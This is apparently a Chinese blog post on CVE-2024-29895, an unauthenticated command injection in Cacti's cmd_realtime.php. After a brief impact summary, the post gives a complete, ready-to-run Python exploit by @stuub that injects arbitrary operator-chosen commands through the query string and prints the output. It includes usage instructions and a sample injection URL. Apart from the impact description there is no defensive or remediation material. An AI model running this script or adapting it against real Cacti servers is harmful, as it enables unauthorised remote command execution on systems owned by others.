CVE-2024-29895 | Cacti服务器命令执行

影响描述

CVE-2024-29895为命令注入漏洞,攻击者可在Cacti服务器的PHP元件启用register_argc_argv功能的情况下,对服务器下达任意命令,过程中无须通过身份验证,CVSS风险评为10分。

poc&exp


# CVE-2024-29895 - RCE in Cacti
#A command injection vulnerability allows any unauthenticated user to execute arbitrary command on the server when register_argc_argv option of PHP is On.
# http://target/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

# Cacti (PHP)
# Affected versions:
# 1.3.x DEV

# Usage: python3 cve-2024-29895.py http://target.com:8080/ "id"
# Developed by @stuub

import requests
import argparse
import urllib3
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

#ANSI Colors
red = "\033[91m"
green = "\033[92m"
yellow = "\033[93m"
purple = "\033[95m"
reset = "\033[0m"

def banner():
    print(f"""


 ▄████▄   ▄▄▄       ▄████▄  ▄▄▄█████▓ ██▓    ██▀███   ▄████▄  ▓█████ 
▒██▀ ▀█  ▒████▄    ▒██▀ ▀█  ▓  ██▒ ▓▒▓██▒   ▓██ ▒ ██▒▒██▀ ▀█  ▓█   ▀ 
▒▓█    ▄ ▒██  ▀█▄  ▒▓█    ▄ ▒ ▓██░ ▒░▒██▒   ▓██ ░▄█ ▒▒▓█    ▄ ▒███   
▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░   ▒██▀▀█▄  ▒▓▓▄ ▄██▒▒▓█  ▄ 
▒ ▓███▀ ░ ▓█   ▓██▒▒ ▓███▀ ░  ▒██▒ ░ ░██░   ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
░ ░▒ ▒  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░  ▒ ░░   ░▓     ░ ▒▓ ░▒▓░░ ░▒ ▒  ░░░ ▒░ ░
  ░  ▒     ▒   ▒▒ ░  ░  ▒       ░     ▒ ░     ░▒ ░ ▒░  ░  ▒    ░ ░  ░
░          ░   ▒   ░          ░       ▒ ░     ░░   ░ ░           ░   
░ ░            ░  ░░ ░                ░        ░     ░ ░         ░  ░
░                  ░                                 ░               

                    {yellow}CVE-2024-29895 - RCE in Cacti 1.3.x DEV{reset}
                              {purple}Developed by @stuub{reset}
          """)

def validate(url):
    endpoint = "/cacti/cmd_realtime.php"
    url = url + endpoint
    response = requests.get(url, verify=False)

    if response.status_code == 200:
        print(f"{green}[*]{reset} Found Cacti installation")
        return True
    else:
        print(f"{red}[!]{reset} Cacti not found")
        return False

def RCE(url, command):
    parsedUrl = urlparse(url)
    strippedUrl = f"{parsedUrl.scheme}://{parsedUrl.netloc}"
    url = strippedUrl
    payload = url + "/cacti/cmd_realtime.php?1+1&&" + command + "+1+1+1"

    print (f"{green}[*]{reset} Targeting URL: {yellow}{payload}{reset}")
    response = requests.get(payload, verify=False)
    print(f"\n{green}[*]{reset} Response:")
    formatted = response.text.replace("<br>", "\n")
    print(formatted)


def main():
    parser = argparse.ArgumentParser(description="CVE-2024-29895 - RCE in Cacti")
    parser.add_argument('-u', '--url', help="URL of the target")
    parser.add_argument('-c', '--command', help="Command to execute")
    args = parser.parse_args()
    url = args.url
    command = args.command
    
    if url is None or command is None:
        print(f"{green}Usage:{reset} python3 cve-2024-29895.py http://target.com:8080/ -c 'id'")
        exit()

    if validate(url):
        RCE(url, command)

if __name__ == "__main__":
    banner()
    main()
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容